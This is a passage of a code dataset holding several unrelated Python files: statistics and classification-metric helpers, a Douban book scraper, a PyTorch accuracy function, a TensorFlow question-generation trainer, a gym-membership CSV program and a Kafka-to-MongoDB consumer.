ou o valor no centro da distribuição. Caso o número de observações na distribuição é ímpar, ele é o valor central, e se o número de observações é par, ele será a média das duas observações mais centrais.\r\n# Quantil : é uma generalização da mediana, valor abaixo do qual está um certo percentual dos dados. No caso da mediana, esse percentual é de 50%\r\n# Moda : é que o valor que mais se repete dentro de um conjunto.\r\n\r\n# Medidas de Dispersão\r\n# ====================\r\n# Amplitude : é a diferença entre o maior e o menor valor de um conjunto de dados.\r\n# Variância : é uma medida que expressa quanto os dados de um conjunto estão afastados de seu valor esperado.\r\n# Desvio Padrão : é uma medida de dispersão, que indica quanto os dados estão afastados da média. Um valor de desvio padrão alto indica que os valores estão mais espalhados, mais longe da média, e um desvio padrão baixo indica que os valores estão mais próximos da média.\r\n# Desvio Absoluto : primeiro, encontramos a média dos valores; depois, calculamos a distância de cada ponto desta média; somamos as distâncias e dividimos o resultado pela média destas distâncias.\r\n\r\n # Fonte: http://felipegalvao.com.br/blog/2016/03/31/estatistica-descritiva-com-python/\r\n\r\n\r\ndef MD(serieReal, seriePrevista):\r\n from sklearn import metrics\r\n import numpy as np\r\n acuracia = metrics.accuracy_score (serieReal,seriePrevista) * 100\r\n f1scores = metrics.f1_score (serieReal,seriePrevista,labels=np.unique(seriePrevista)) * 100\r\n recalls = metrics.recall_score (serieReal,seriePrevista) * 100\r\n precision= metrics.precision_score(serieReal,seriePrevista) * 100\r\n\r\n return precision, acuracia, f1scores, recalls\r\n\r\n# Medidas de Desempenho (Gravando)\r\ndef MDgravar(TesteY, predicao , algoritmo , saida2):\r\n from sklearn import metrics\r\n import numpy as np\r\n acuracia = metrics.accuracy_score(TesteY,predicao)\r\n f1scores = metrics.f1_score(TesteY,predicao,labels=np.unique(predicao))\r\n recalls = metrics.recall_score(TesteY,predicao)\r\n precision= metrics.precision_score(TesteY,predicao)\r\n\r\n acuracia = round(float(acuracia),2)\r\n f1scores = round(float(f1scores),2)\r\n recalls = round(float(recalls),2)\r\n\r\n saida2.write(str(algoritmo) + \";\" + \r\n str(acuracia) + \";\" + \r\n str(f1scores) + \";\" + \r\n str(recalls) + \";\" + \r\n str(precision) + \"\\n\"\r\n )\r\n return\r\n\r\n\r\ndef calculado(serieRealA, seriePrevistaA):\r\n qtdePositivo=0\r\n qtdeNegativo=0\r\n truePositivo=0\r\n falsePositivo=0\r\n trueNegativo=0\r\n falseNegativo=0\r\n\r\n 
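# The loop below tallies a 2x2 confusion matrix by hand; the scores are then\r\n    # derived as precision = TP/(TP+FP), accuracy = (TP+TN)/total, recall = TP/(TP+FN),\r\n    # F1 = 2*P*R/(P+R) and specificity = TN/(TN+FP), each returned scaled by 100.\r\n    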
precisao=0\r\n acuracia=0\r\n f1score =0\r\n recall =0\r\n specificity =0\r\n\r\n serieReal = []\r\n seriePrevista = []\r\n\r\n for item in serieRealA: #==>> Convertendo numpy array to List\r\n serieReal.append(int(item))\r\n\r\n for item in seriePrevistaA:\r\n seriePrevista.append(int(item))\r\n\r\n i=0\r\n while i< len(serieReal):\r\n if seriePrevista[i]==0:\r\n qtdeNegativo+=1\r\n if seriePrevista[i]==serieReal[i]:\r\n trueNegativo+=1\r\n else:\r\n falseNegativo+=1\r\n\r\n if seriePrevista[i]==1:\r\n qtdePositivo+=1\r\n if seriePrevista[i]==serieReal[i]:\r\n truePositivo+=1\r\n else:\r\n falsePositivo+=1\r\n\r\n i+=1\r\n\r\n\r\n if (truePositivo + trueNegativo) !=0:\r\n acuracia = (truePositivo + trueNegativo) / ( truePositivo + trueNegativo + falsePositivo + falseNegativo)\r\n\r\n if truePositivo !=0:\r\n precisao = truePositivo / (truePositivo + falsePositivo)\r\n\r\n if truePositivo !=0:\r\n recall = truePositivo / (truePositivo + falseNegativo)\r\n\r\n\r\n if precisao !=0:\r\n f1score = 2*precisao*recall / (precisao+recall)\r\n\r\n if trueNegativo !=0:\r\n specificity = trueNegativo / (trueNegativo + falsePositivo)\r\n\r\n return precisao*100, acuracia*100, f1score*100, recall*100, specificity*100\r\n\r\n\r\n# Fonte: http://felipegalvao.com.br/blog/2016/03/31/estatistica-descritiva-com-python/\r\n#\r\n# Medidas de Tendência Central\r\n#\r\n# As medidas de tendência central definem valores significativos, representativos e adequados para um conjunto de dados,\r\n# dependendo do que se deseja analisar. São elas a média, mediana, quantis e a moda.\r\n#\r\n#\r\ndef medidastendencia(tab):\r\n import pandas as pd\r\n #tab =[22,23,21,28,10,30,38,16, 38]\r\n serie = pd.Series(tab)\r\n\r\n# Média\r\n# A média é uma medida de tendência central que indica o valor onde estão concentrados os dados de um conjunto de valores,\r\n# representando um valor significativo para o mesmo.\r\n media = serie.mean()\r\n\r\n# Mediana e Quantil\r\n# A mediana é o valor que separa a metade superior da metade inferior de uma distribuição de dados, ou o valor no centro da distribuição.\r\n# Na prática, se o número de observações na distribuição é ímpar, ele é o valor central, e se o número de observações é par, ele será a\r\n# média das duas observações mais centrais.\r\n mediana = serie.median()\r\n\r\n# Já o quantil pode ser entendido como uma generalização da mediana. O quantil é o valor abaixo do qual está um certo percentual dos dados.\r\n# No caso da mediana, esse percentual é de 50%\r\n quantil = serie.quantile()\r\n\r\n# Moda\r\n# A moda é simples. Nada mais é que o valor que mais se repete dentro de um conjunto.\r\n moda = serie.mode()\r\n\r\n\r\n print(\"media=\", media)\r\n print(\"mediana=\", mediana)\r\n print(\"quantil=\", quantil)\r\n print(\"moda=\", moda)\r\n return media, mediana, quantil, moda","sub_path":"20190826 - simulacao RBM + KNN V64/f_metricas.py","file_name":"f_metricas.py","file_ext":"py","file_size_in_byte":7461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"585727381","text":"import requests\r\nimport re\r\nimport pandas as pd\r\n\r\ndef getHTMLText(url,List):\r\n try:\r\n for i in range(50):\r\n r = requests.get(url+str(i*20))\r\n print (r.url)\r\n r.raise_for_status\r\n r.encoding = r.apparent_encoding\r\n\r\n fillList(r.text,List)\r\n except:\r\n return \"\"\r\n\r\ndef fillList(html,List):\r\n print('-'*10)\r\n for each in re.findall(r'
<li class=\"subject-item\">.*?</li>',html,re.S):\n        title = re.findall(r'title=\"(.*?)\"',each)[0]\n        text = re.findall(r'<div class=\"pub\">(.*?)</div>
    ',each,re.S)[0].strip()\r\n author = text.split('/')[0].strip()\r\n translator = text.split('/',2)[1].strip()\r\n publish = text.split('/',3)[2].strip()\r\n time = text.split('/',4)[-2].strip()\r\n price = text.split('/',4)[-1].strip()\r\n List.append([title,author,translator,publish,time,price])\r\n return List\r\n\r\n\r\ndef printList(List):\r\n #tplt = '{0:^10}\\t{1:{7}^15}\\t{2:{7}^15}\\t{3:{7}^15}\\t{4:{7}^12}\\t{5:{7}^8}\\t{6:{7}^10}'\r\n #print (tplt.format('num','名称','作者','翻译','出版社','出版时间','价格',chr(12288)))\r\n #for i in range(len(List)):\r\n # u = List[i]\r\n # print(tplt.format(str(i+1),u[0],u[1],u[2],u[3],u[4],u[5],chr(12288)))\r\n name = ['序号','名称','作者','翻译','出版社','价格']\r\n test = pd.DataFrame(columns = name,data = List)\r\n test.to_csv('C:\\\\Users\\\\Administrator\\\\Desktop\\\\爬虫进阶\\\\豆瓣推理小说.csv')\r\n \r\n\r\n\r\ndef main():\r\n url = 'https://book.douban.com/tag/推理?start='\r\n List = []\r\n html = getHTMLText(url,List)\r\n printList(List)\r\n\r\nmain()\r\n \r\n","sub_path":"豆瓣.py","file_name":"豆瓣.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"27683540","text":"def accuracy(output, target, ks=(1,5), ):\n maxk = max(ks) \n batch_size = target.size(0)\n # output is a batch_size x num_categories tensor (row vecs)\n # returns the indices (aka cat ids)\n _, prediction = output.topk(maxk, dim=1, largest=True, sorted=True)\n # prediction is a batch_size x k array where each row is the top k index predictions for that batch item.\n prediction = prediction.t() # transpose to a matrix of dim k x batch_size\n # the view call reshapes the tensor w/ one row and arbitrary cols \n # expand_as just drags out the end of the tensor out....\n #this line flattens the target into a row vector with len bach_size and repeats it k times to get something the same shape as prediction, then equates\n correct = prediction.eq(target.view(1, -1).expand_as(prediction))\n\n ret = []\n for k in ks: \n correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)\n ret.append(correct_k.mul(100.0 / batch_size))\n return ret\n\n\n","sub_path":"Resnet Code/accuracy.py","file_name":"accuracy.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"56892663","text":"# -*- coding: utf-8 -*-\n#used for training Question Generation Model\nfrom __future__ import print_function\nimport argparse\nimport os\nimport sys\nimport time\nimport numpy as np\nimport codecs\n\nfrom vocab_utils import Vocab\nimport namespace_utils\nimport NP2P_data_stream\nfrom NP2P_model_graph import ModelGraph\n\nFLAGS = None\nimport tensorflow as tf\ntf.logging.set_verbosity(tf.logging.ERROR) # DEBUG, INFO, WARN, ERROR, and FATAL\n\nfrom nltk.translate.bleu_score import SmoothingFunction, corpus_bleu, sentence_bleu\ncc = SmoothingFunction()\n\nimport metric_utils\n\nimport platform\ndef get_machine_name():\n return platform.node()\n\ndef vec2string(val):\n result = \"\"\n for v in val:\n result += \" {}\".format(v)\n return result.strip()\n\n\ndef softmax(x):\n \"\"\"Compute softmax values for each sets of scores in x.\"\"\"\n e_x = np.exp(x - np.max(x))\n return e_x / e_x.sum()\n\n\ndef document_bleu(vocab, gen, ref, suffix=''):\n genlex = [vocab.getLexical(x)[1] for x in gen]\n reflex = [[vocab.getLexical(x)[1],] for x in ref]\n #return metric_utils.evaluate_captions(genlex,reflex)\n genlst = [x.split() for x in genlex]\n reflst = 
[[x[0].split()] for x in reflex]\n f = codecs.open('gen.txt'+suffix,'w','utf-8')\n for line in genlex:\n print(line, end='\\n', file=f)\n f.close()\n f = codecs.open('ref.txt'+suffix,'w','utf-8')\n for line in reflex:\n print(line[0], end='\\n', file=f)\n f.close()\n return corpus_bleu(reflst, genlst, smoothing_function=cc.method3)\n\n\ndef evaluate(sess, valid_graph, devDataStream, options=None, suffix=''):\n devDataStream.reset()\n gen = []\n ref = []\n dev_loss = 0.0\n dev_right = 0.0\n dev_total = 0.0\n for batch_index in xrange(devDataStream.get_num_batch()): # for each batch\n cur_batch = devDataStream.get_batch(batch_index)\n if valid_graph.mode == 'evaluate':\n accu_value, loss_value = valid_graph.run_ce_training(sess, cur_batch, options, only_eval=True)\n dev_loss += loss_value\n dev_right += accu_value\n dev_total += np.sum(cur_batch.answer_lengths)\n elif valid_graph.mode == 'evaluate_bleu':\n gen.extend(valid_graph.run_greedy(sess, cur_batch, options).tolist())\n ref.extend(cur_batch.in_answer_words.tolist())\n else:\n assert False\n\n if valid_graph.mode == 'evaluate':\n return {'dev_loss':dev_loss, 'dev_accu':1.0*dev_right/dev_total, 'dev_right':dev_right, 'dev_total':dev_total, }\n else:\n return {'dev_bleu':document_bleu(valid_graph.word_vocab,gen,ref,suffix), }\n\n\n\ndef main(_):\n print('Configurations:')\n print(FLAGS)\n\n log_dir = FLAGS.model_dir\n if not os.path.exists(log_dir):\n os.makedirs(log_dir)\n\n path_prefix = log_dir + \"/NP2P.{}\".format(FLAGS.suffix)\n log_file_path = path_prefix + \".log\"\n print('Log file path: {}'.format(log_file_path))\n log_file = open(log_file_path, 'wt')\n log_file.write(\"{}\\n\".format(FLAGS))\n log_file.flush()\n\n # save configuration\n namespace_utils.save_namespace(FLAGS, path_prefix + \".config.json\")\n\n print('Loading train set.')\n if FLAGS.infile_format == 'fof':\n trainset, train_ans_len = NP2P_data_stream.read_generation_datasets_from_fof(FLAGS.train_path, isLower=FLAGS.isLower)\n elif FLAGS.infile_format == 'plain':\n trainset, train_ans_len = NP2P_data_stream.read_all_GenerationDatasets(FLAGS.train_path, isLower=FLAGS.isLower)\n else:\n trainset, train_ans_len = NP2P_data_stream.read_all_GQA_questions(FLAGS.train_path, isLower=FLAGS.isLower, switch=FLAGS.switch_qa)\n print('Number of training samples: {}'.format(len(trainset)))\n\n print('Loading test set.')\n if FLAGS.infile_format == 'fof':\n testset, test_ans_len = NP2P_data_stream.read_generation_datasets_from_fof(FLAGS.test_path, isLower=FLAGS.isLower)\n elif FLAGS.infile_format == 'plain':\n testset, test_ans_len = NP2P_data_stream.read_all_GenerationDatasets(FLAGS.test_path, isLower=FLAGS.isLower)\n else:\n testset, test_ans_len = NP2P_data_stream.read_all_GQA_questions(FLAGS.test_path, isLower=FLAGS.isLower, switch=FLAGS.switch_qa)\n print('Number of test samples: {}'.format(len(testset)))\n\n max_actual_len = max(train_ans_len, test_ans_len)\n print('Max answer length: {}, truncated to {}'.format(max_actual_len, FLAGS.max_answer_len))\n\n word_vocab = None\n POS_vocab = None\n NER_vocab = None\n char_vocab = None\n has_pretrained_model = False\n best_path = path_prefix + \".best.model\"\n if os.path.exists(best_path + \".index\"):\n has_pretrained_model = True\n print('!!Existing pretrained model. 
Loading vocabs.')\n if FLAGS.with_word:\n word_vocab = Vocab(FLAGS.word_vec_path, fileformat='txt2')\n print('word_vocab: {}'.format(word_vocab.word_vecs.shape))\n if FLAGS.with_char:\n char_vocab = Vocab(path_prefix + \".char_vocab\", fileformat='txt2')\n print('char_vocab: {}'.format(char_vocab.word_vecs.shape))\n if FLAGS.with_POS:\n POS_vocab = Vocab(path_prefix + \".POS_vocab\", fileformat='txt2')\n print('POS_vocab: {}'.format(POS_vocab.word_vecs.shape))\n if FLAGS.with_NER:\n NER_vocab = Vocab(path_prefix + \".NER_vocab\", fileformat='txt2')\n print('NER_vocab: {}'.format(NER_vocab.word_vecs.shape))\n else:\n print('Collecting vocabs.')\n (allWords, allChars, allPOSs, allNERs) = NP2P_data_stream.collect_vocabs(trainset)\n print('Number of words: {}'.format(len(allWords)))\n print('Number of allChars: {}'.format(len(allChars)))\n print('Number of allPOSs: {}'.format(len(allPOSs)))\n print('Number of allNERs: {}'.format(len(allNERs)))\n\n if FLAGS.with_word:\n word_vocab = Vocab(FLAGS.word_vec_path, fileformat='txt2')\n if FLAGS.with_char:\n char_vocab = Vocab(voc=allChars, dim=FLAGS.char_dim, fileformat='build')\n char_vocab.dump_to_txt2(path_prefix + \".char_vocab\")\n if FLAGS.with_POS:\n POS_vocab = Vocab(voc=allPOSs, dim=FLAGS.POS_dim, fileformat='build')\n POS_vocab.dump_to_txt2(path_prefix + \".POS_vocab\")\n if FLAGS.with_NER:\n NER_vocab = Vocab(voc=allNERs, dim=FLAGS.NER_dim, fileformat='build')\n NER_vocab.dump_to_txt2(path_prefix + \".NER_vocab\")\n\n print('word vocab size {}'.format(word_vocab.vocab_size))\n sys.stdout.flush()\n\n print('Build DataStream ... ')\n trainDataStream = NP2P_data_stream.QADataStream(trainset, word_vocab, char_vocab, POS_vocab, NER_vocab, options=FLAGS,\n isShuffle=True, isLoop=True, isSort=True)\n\n devDataStream = NP2P_data_stream.QADataStream(testset, word_vocab, char_vocab, POS_vocab, NER_vocab, options=FLAGS,\n isShuffle=False, isLoop=False, isSort=True)\n print('Number of instances in trainDataStream: {}'.format(trainDataStream.get_num_instance()))\n print('Number of instances in devDataStream: {}'.format(devDataStream.get_num_instance()))\n print('Number of batches in trainDataStream: {}'.format(trainDataStream.get_num_batch()))\n print('Number of batches in devDataStream: {}'.format(devDataStream.get_num_batch()))\n sys.stdout.flush()\n\n init_scale = 0.01\n # initialize the best bleu and accu scores for current training session\n best_accu = FLAGS.best_accu if FLAGS.__dict__.has_key('best_accu') else 0.0\n best_bleu = FLAGS.best_bleu if FLAGS.__dict__.has_key('best_bleu') else 0.0\n if best_accu > 0.0:\n print('With initial dev accuracy {}'.format(best_accu))\n if best_bleu > 0.0:\n print('With initial dev BLEU score {}'.format(best_bleu))\n\n with tf.Graph().as_default():\n initializer = tf.random_uniform_initializer(-init_scale, init_scale)\n with tf.name_scope(\"Train\"):\n with tf.variable_scope(\"Model\", reuse=None, initializer=initializer):\n train_graph = ModelGraph(word_vocab=word_vocab, char_vocab=char_vocab, POS_vocab=POS_vocab,\n NER_vocab=NER_vocab, options=FLAGS, mode=FLAGS.mode)\n\n assert FLAGS.mode in ('ce_train', 'rl_train', )\n valid_mode = 'evaluate' if FLAGS.mode == 'ce_train' else 'evaluate_bleu'\n\n with tf.name_scope(\"Valid\"):\n with tf.variable_scope(\"Model\", reuse=True, initializer=initializer):\n valid_graph = ModelGraph(word_vocab=word_vocab, char_vocab=char_vocab, POS_vocab=POS_vocab,\n NER_vocab=NER_vocab, options=FLAGS, mode=valid_mode)\n\n initializer = tf.global_variables_initializer()\n\n vars_ = 
{}\n for var in tf.all_variables():\n if \"word_embedding\" in var.name: continue\n if not var.name.startswith(\"Model\"): continue\n vars_[var.name.split(\":\")[0]] = var\n saver = tf.train.Saver(vars_)\n\n sess = tf.Session()\n sess.run(initializer)\n if has_pretrained_model:\n print(\"Restoring model from \" + best_path)\n saver.restore(sess, best_path)\n print(\"DONE!\")\n\n if FLAGS.mode == 'rl_train' and abs(best_bleu) < 0.00001:\n print(\"Getting BLEU score for the model\")\n best_bleu = evaluate(sess, valid_graph, devDataStream, options=FLAGS)['dev_bleu']\n FLAGS.best_bleu = best_bleu\n namespace_utils.save_namespace(FLAGS, path_prefix + \".config.json\")\n print('BLEU = %.4f' % best_bleu)\n log_file.write('BLEU = %.4f\\n' % best_bleu)\n if FLAGS.mode == 'ce_train' and abs(best_accu) < 0.00001:\n print(\"Getting ACCU score for the model\")\n best_accu = evaluate(sess, valid_graph, devDataStream, options=FLAGS)['dev_accu']\n FLAGS.best_accu = best_accu\n namespace_utils.save_namespace(FLAGS, path_prefix + \".config.json\")\n print('ACCU = %.4f' % best_accu)\n log_file.write('ACCU = %.4f\\n' % best_accu)\n\n print('Start the training loop.')\n train_size = trainDataStream.get_num_batch()\n max_steps = train_size * FLAGS.max_epochs\n total_loss = 0.0\n start_time = time.time()\n for step in xrange(max_steps):\n cur_batch = trainDataStream.nextBatch()\n if FLAGS.mode == 'rl_train':\n loss_value = train_graph.run_rl_training_2(sess, cur_batch, FLAGS)\n elif FLAGS.mode == 'ce_train':\n loss_value = train_graph.run_ce_training(sess, cur_batch, FLAGS)\n total_loss += loss_value\n\n if step % 100==0:\n print('{} '.format(step), end=\"\")\n sys.stdout.flush()\n\n\n # Save a checkpoint and evaluate the model periodically.\n if (step + 1) % trainDataStream.get_num_batch() == 0 or (step + 1) == max_steps:\n print()\n duration = time.time() - start_time\n print('Step %d: loss = %.2f (%.3f sec)' % (step, total_loss, duration))\n log_file.write('Step %d: loss = %.2f (%.3f sec)\\n' % (step, total_loss, duration))\n log_file.flush()\n sys.stdout.flush()\n total_loss = 0.0\n\n # Evaluate against the validation set.\n start_time = time.time()\n print('Validation Data Eval:')\n res_dict = evaluate(sess, valid_graph, devDataStream, options=FLAGS, suffix=str(step))\n if valid_graph.mode == 'evaluate':\n dev_loss = res_dict['dev_loss']\n dev_accu = res_dict['dev_accu']\n dev_right = int(res_dict['dev_right'])\n dev_total = int(res_dict['dev_total'])\n print('Dev loss = %.4f' % dev_loss)\n log_file.write('Dev loss = %.4f\\n' % dev_loss)\n print('Dev accu = %.4f %d/%d' % (dev_accu, dev_right, dev_total))\n log_file.write('Dev accu = %.4f %d/%d\\n' % (dev_accu, dev_right, dev_total))\n log_file.flush()\n if best_accu < dev_accu:\n print('Saving weights, ACCU {} (prev_best) < {} (cur)'.format(best_accu, dev_accu))\n saver.save(sess, best_path)\n best_accu = dev_accu\n FLAGS.best_accu = dev_accu\n namespace_utils.save_namespace(FLAGS, path_prefix + \".config.json\")\n else:\n dev_bleu = res_dict['dev_bleu']\n print('Dev bleu = %.4f' % dev_bleu)\n log_file.write('Dev bleu = %.4f\\n' % dev_bleu)\n log_file.flush()\n if best_bleu < dev_bleu:\n print('Saving weights, BLEU {} (prev_best) < {} (cur)'.format(best_bleu, dev_bleu))\n saver.save(sess, best_path)\n best_bleu = dev_bleu\n FLAGS.best_bleu = dev_bleu\n namespace_utils.save_namespace(FLAGS, path_prefix + \".config.json\")\n duration = time.time() - start_time\n print('Duration %.3f sec' % (duration))\n sys.stdout.flush()\n\n log_file.write('Duration %.3f 
sec\\n' % (duration))\n log_file.flush()\n\n log_file.close()\n\ndef enrich_options(options):\n if not options.__dict__.has_key(\"CE_loss\"):\n options.__dict__[\"CE_loss\"] = False\n\n if not options.__dict__.has_key(\"infile_format\"):\n options.__dict__[\"infile_format\"] = \"plain\"\n\n if not options.__dict__.has_key(\"with_target_lattice\"):\n options.__dict__[\"with_target_lattice\"] = False\n\n if not options.__dict__.has_key(\"add_first_word_prob_for_phrase\"):\n options.__dict__[\"add_first_word_prob_for_phrase\"] = False\n\n if not options.__dict__.has_key(\"pretrain_with_max_matching\"):\n options.__dict__[\"pretrain_with_max_matching\"] = False\n\n if not options.__dict__.has_key(\"reward_type\"):\n options.__dict__[\"reward_type\"] = \"bleu\"\n\n return options\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--config_path', type=str, help='Configuration file.')\n\n print(\"CUDA_VISIBLE_DEVICES \" + os.environ['CUDA_VISIBLE_DEVICES'])\n FLAGS, unparsed = parser.parse_known_args()\n\n\n if FLAGS.config_path is not None:\n print('Loading the configuration from ' + FLAGS.config_path)\n FLAGS = namespace_utils.load_namespace(FLAGS.config_path)\n\n FLAGS = enrich_options(FLAGS)\n\n sys.stdout.flush()\n tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)\n","sub_path":"src/NP2P_trainer.py","file_name":"NP2P_trainer.py","file_ext":"py","file_size_in_byte":14731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"227268439","text":"\nimport threading\n\nimport settings\n\nclass Subscriber(threading.Thread):\n def __init__(self, redis):\n self.pubsub = redis.pubsub()\n self.pubsub.subscribe(settings.CHANNEL + 'out')\n self.result = None\n\n threading.Thread.__init__(self)\n \n def run(self):\n self.listener = self.pubsub.listen()\n while True:\n message = self.listener.next()\n if message['type'] == 'subscribe':\n continue\n self.result = message['data']\n break\n","sub_path":"rustkr/models/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"588716389","text":"import csv\r\nclass memberprofile:\r\n\r\n def __init__(self, ph_no, bmi, name):\r\n self.mobile_no = ph_no\r\n self.name = name\r\n self.a_bmi = bmi\r\n self.user_member = []\r\n self.regimen = []\r\n cv = csv.reader(open(\"regimen_list.csv\", \"r\", newline=\"\"))\r\n for row in cv:\r\n self.regimen.append(row)\r\n dv = csv.reader(open(\"user_member_list.csv\", \"r\", newline=\"\"))\r\n for row in dv:\r\n self.user_member.append(row)\r\n\r\n def my_profile(self):\r\n n = self.mobile_no\r\n for i in self.user_member:\r\n if int(i[3]) == n:\r\n print(\"Full Name:{0} \\nAge:{1} \\nGender:{2} \\nMobile Number:{3} \\nEmail:{4} \\nBMI:{5} \\nMembership Duration:{6}\".format(i[0], i[1], i[2], i[3], i[4], i[5], i[6]))\r\n break\r\n\r\n def my_regimen(self):\r\n for i in self.regimen:\r\n if self.a_bmi == float(i[0]):\r\n print(\"{} Your Workout Regimen\".format(self.name))\r\n print(\"BMI:{} \\nMonday:{} \\nTuesday:{} \\nWednesday:{} \\nThursday:{} \"\r\n \"\\nFriday:{} \\nSaturday:{} \\nSunday:{}\".format(i[0],i[1],i[2],i[3],i[4],i[5],i[6],i[7]))\r\n break\r\n elif self.a_bmi < 18.5 and float(i[0]) == 18.5:\r\n print(\"{} Your Workout Regimen\".format(self.name))\r\n print(\"BMI:{} \\nMonday:{} \\nTuesday:{} \\nWednesday:{} \\nThursday:{} \"\r\n \"\\nFriday:{} \\nSaturday:{} \\nSunday:{}\".format(i[0], i[1], i[2], 
i[3], i[4], i[5], i[6], i[7]))\r\n break\r\n elif self.a_bmi < 25 and float(i[0]) == 25:\r\n print(\"{} Your Workout Regimen\".format(self.name))\r\n print(\"BMI:{} \\nMonday:{} \\nTuesday:{} \\nWednesday:{} \\nThursday:{} \"\r\n \"\\nFriday:{} \\nSaturday:{} \\nSunday:{}\".format(i[0], i[1], i[2], i[3], i[4], i[5], i[6], i[7]))\r\n break\r\n elif self.a_bmi <= 29 and float(i[0]) == 29:\r\n print(\"{} Your Workout Regimen\".format(self.name))\r\n print(\"BMI:{} \\nMonday:{} \\nTuesday:{} \\nWednesday:{} \\nThursday:{} \"\r\n \"\\nFriday:{} \\nSaturday:{} \\nSunday:{}\".format(i[0], i[1], i[2], i[3], i[4], i[5], i[6], i[7]))\r\n break\r\n elif self.a_bmi >= 30 and float(i[0]) == 30:\r\n print(\"{} Your Workout Regimen\".format(self.name))\r\n print(\"BMI:{} \\nMonday:{} \\nTuesday:{} \\nWednesday:{} \\nThursday:{} \"\r\n \"\\nFriday:{} \\nSaturday:{} \\nSunday:{}\".format(i[0], i[1], i[2], i[3], i[4], i[5], i[6], i[7]))\r\n break\r\n else:\r\n print(\"Workout Regimen Not Avalible \\n{}-Sorry Sir/Mam Please Ask a SuperUser to Create a Workout Regimen for your BMI\".format(self.name))\r\n\r\n def member_menu(self):\r\n flag = True\r\n while flag:\r\n try:\r\n self.choice = int(input(\"\\nPress 1 To View My Workout Regimen \\nPress 2 To View a My Profile \\nPress 0 To Exit\"))\r\n if self.choice == 1:\r\n self.my_regimen()\r\n elif self.choice == 2:\r\n self.my_profile()\r\n elif self.choice == 0:\r\n print(\"Thank You....!!!!\")\r\n flag = False\r\n else:\r\n print(\"Not Valid Choice, Try Again....!!!!\")\r\n except:\r\n print(\"Invalid Input------!!!\")\r\n\r\n","sub_path":"member.py","file_name":"member.py","file_ext":"py","file_size_in_byte":3460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"53006552","text":"#!/usr/bin/env python\n# coding=utf-8\n\nimport sys\nimport os\nimport logging\nimport json\n\nlogging.basicConfig(level = logging.WARNING,format = '[%(filename)s:%(funcName)s:%(lineno)s]%(message)s')\nlogger = logging.getLogger(\"iSearch\")\n\n\nclass Configer:\n def __init__(self, configPath):\n with open(configPath) as json_data_file:\n self.__config = json.load(json_data_file)\n\n def __del__(self):\n self.__config.close()\n\n def __set_check_func(self):\n self.__checkFunc = {\n \"version\":versionCheck,\n \"titleColor\":ColorCheck,\n \"textColor\":ColorCheck,\n }\n\n def get_config_option(self, key):\n return self.__config[\"key\"]\n\n def set_config_option(self, key, value):\n if self.__checkFunc[key](key, value):\n self.__config[key] = value\n\n def versionCheck(self, key, value):\n if(\"1.0\" == value or \"1.1\" == value):\n return 1\n else:\n logger.error(\"version error\")\n sys.exit(1)\n\n def ColorCheck(self,key, value):\n if value in ColorArr:\n return 1\n else:\n logger.error(key + \" can't be setted \" + value)\n sys.exit(1)\n\n\n\n\n","sub_path":"iSearch/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"161774125","text":"from setuptools import setup, find_packages\nfrom native_tags import __version__\n\ntry:\n readme = open('README.rst').read()\nexcept IOError:\n readme = ''\n\nsetup(name='django-native-tags',\n version=__version__,\n description='Native, Pythonic Templatetags for Django',\n long_description=readme,\n author='Justin Quick',\n author_email='justquick@gmail.com',\n url='http://github.com/justquick/django-native-tags',\n 
packages=find_packages(exclude=('example_project',)),\n classifiers=['Development Status :: 5 - Production/Stable',\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Topic :: Utilities'],\n )\n","sub_path":"pypi_install_script/django-native-tags-0.5.3.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"517671299","text":"from kafka import KafkaConsumer\nfrom pymongo import MongoClient\nfrom json import loads\n#import datetime\nimport csv\n\nconsumer = KafkaConsumer(\n 'numtest',\n bootstrap_servers=['localhost:9092'],\n auto_offset_reset='latest', #coba latest\n enable_auto_commit=True,\n group_id='my-group',\n value_deserializer=lambda x: loads(x.decode('utf-8')))\n\nclient = MongoClient('localhost:27017')\ncollection = client.numtest.numtest\n\nmsg_to_csv = []\nnum = 1\nfieldnames = ['MinTemp', 'MaxTemp', 'Rainfall', 'Evaporation', 'Sunshine', 'WindGustDir', 'WindGustSpeed', 'WindDir9am', 'WindDir3pm', 'WindSpeed9am', 'WindSpeed3pm', 'Humidity9am', 'Humidity3pm', 'Pressure9am', 'Pressure3pm', 'Cloud9am', 'Cloud3pm', 'Temp9am', 'Temp3pm', 'RainToday', 'RISK_MM']\n\nfor i, message in enumerate(consumer):\n message = message.value\n collection.insert_one(message)\n msg_to_csv.append(message['number'])\n if (i+1) % 47000 == 0:\n if i+1 < 94001:\n csvFile = open(\"model_\" +str(num)+\".csv\" ,'w')\n \n csvWriter = csv.DictWriter(csvFile, fieldnames=fieldnames)\n csvWriter.writeheader()\n for isi in msg_to_csv:\n csvWriter.writerow({'MinTemp': isi[0], 'MaxTemp': isi[1], 'Rainfall': isi[2], 'Evaporation': isi[3], 'Sunshine': isi[4], 'WindGustDir': isi[5], 'WindGustSpeed': isi[6], 'WindDir9am': isi[7], 'WindDir3pm': isi[8], 'WindSpeed9am': isi[9], 'WindSpeed3pm': isi[10], 'Humidity9am': isi[11], 'Humidity3pm': isi[12], 'Pressure9am': isi[13], 'Pressure3pm': isi[14], 'Cloud9am': isi[15], 'Cloud3pm': isi[16], 'Temp9am': isi[17], 